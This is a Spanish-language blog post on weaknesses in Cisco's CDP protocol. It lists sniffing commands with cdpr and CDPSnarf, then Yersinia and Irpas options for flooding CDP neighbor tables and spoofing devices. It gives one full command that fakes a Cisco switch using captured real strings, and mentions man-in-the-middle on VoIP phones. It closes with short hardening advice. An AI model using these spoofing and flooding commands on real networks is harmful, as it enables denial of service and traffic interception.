Cisco Bajo fuego

Cisco bajo fuego ( Cisco hacking )


La informacion ya es un poco vieja, pero aun asi vale la pena.

Los routers y switches cisco,  se han extendido por las redes corporativas y han estado en el podio por años. Sin embargo, no dejan de ser sistemas con errores, como todos. Que además son configurados por humanos, los cuales cometen mas errores que los sistemas informáticos (que lo tiro!).
Lo importante, es que si tenemos en nuestras redes algún dispositivo cisco, debemos ser sumamente cuidadosos a la hora de configurarlos, ya que por defecto no son seguros.
En los próximos post veremos algunas técnicas que deberíamos conocer para proteger nuestras redes de los errores humanos inoportunos.
CDP Hacking
Estos routers (y switches), traen por defecto muchos protocolos propietarios habilitados para el funcionamiento en conjunto con otros routers/switches cisco. El emblema de estos es CDP, Cisco Discovery Protocol.
CDP  “Es utilizado para compartir información sobre otros equipos Cisco directamente conectados, tal como la versión del sistema operativo y la dirección IP
(recomiendo ver la especificación de Cisco de CDP aquí)

Como mente inquieta, podrás imaginar que esto es sumamente peligroso si no se controla adecuadamente. Lo que menos queremos es andar publicando sistema y detalles de la configuración de nuestra red.
CDPR: Esta herramienta deslumbra por su simpleza.
Que mas queremos que simplemente ver esos paquetes que circulan por la red entregando la tan preciada información?
cdpr -d eth0 -t 240
(Con -vvv tendremos mucha mas información)
CDPSnarf:  Con el mismo estilo que cdpr, CDPSnarf nos permite además
realizar la detección de paquetes CDP desde un archivo PCAP
cdpsnarf -i <dev> [-h] [-w savefile] [-r dumpfile] [-d]
-i      interface donde snifear
-w      guardar resultados en archivo pcap
-r      leer archivo pcap
-d     debug
Hasta aquí, muy pasivo, pero nos falta ver 2 herramientas esenciales a la hora de hablar de protocolos de red: Yersinia y Irpas
Yersinia no solo es una exelente herramienta, si no que además es libre.
En particular para CDP, permite 3 operaciones:
Sending RAW CDP packet
DoS flooding CDP neighbors table
Setting up a virtual device
Para saber como realizar un DoS con CDP aqui tenemos un ejemplo muy claro:
Irpas: ó Internetwork Routing Protocol Attack Suite, como pueden deducir es otra suite que nos permite realizar distintos tipos de experimentos para testear nuestra red. En este caso, usaremos el programa cdp de la suite (obvio?).
cdp [-v] -i <interface> -m {0,1} ...
Flood mode (-m 0):
-n <number>    number of packets
-l <number>    length of the device id
-c <char>    character to fill in device id
-r        randomize device id string
Spoof mode (-m 1):
-D <string>    Device id
-P <string>    Port id
-L <string>    Platform
-S <string>    Software
-F <string>    IP address
-C <capabilities>
 these are:
 R - Router, T - Trans Bridge, B - Source Route Bridge
 S - Switch, H - Host, I - IGMP, r - Repeater

Facilisimo de utilizar, cdp de irpas nos permite, por ejemplo, enviar 10 paquetes anunciando la existencia de un Switch:
zick@Ammi:/# cdp -m 1 -n 10  -v -i eth0 -D "SW-Atlantis-9" -P "GigabitEthernet0/1" -L  "cisco WS-C3560G-48PS"  \

-S “Cisco IOS Software, C3560 Software (C3560-IPBASEK9-M), Version 12.2(25)SED1, RELEASE SOFTWARE (fc1) \
Copyright (c) 1986-2005 by Cisco Systems, Inc.\
Compiled Tue 22-Nov-05 23:18 by yenanh" -F 192.168.1.1 -C S

Esta linea, confundiría a cualquier net admin, ya que son datos reales, es decir, extraidos de un:
cdpr -t 240  -d eth0 -v

El cual me permite sacar strings reales, para que nuestro spoof sea lo mas creible posible. Si piensan bien, no solo podemos spoofear para tomar datos sensibles de un router, si no para hacer un Man in the midle, o bien, para decargar configuraciones a los telefonos voip cisco, lo que puede resultar un poco mas divertido, si por ejemplo logramos hacer un man in the midle de las conversaciones. Pero todo esto es harina de otro costal, ya que lo que nos interesa en si, es conocer los problemas para poder protegernos.
La lista de tareas a realizar es deducible:

  • Restringir los puertos en los que se usa CDP 
  • Configurar las herramientas de control centralizado que usan SNMP para evitar conectarse a cualquier dispositivo nuevo 
  • Incrementar el tiempo en que los paquetes CDP puede ser útil dependiendo de varias circunstancias

Ya ven, como un protocolo tan simple, puede ser usado para hacer mucho daño si no configuramos bien nuestras redes.
Este es el mas simple de los protcolos de CISCO, y no hemos ahondado sobre las posibilidades, imaginen los que nos queda por delante ….

No hay comentarios:

Publicar un comentario

Prompter ScriptQ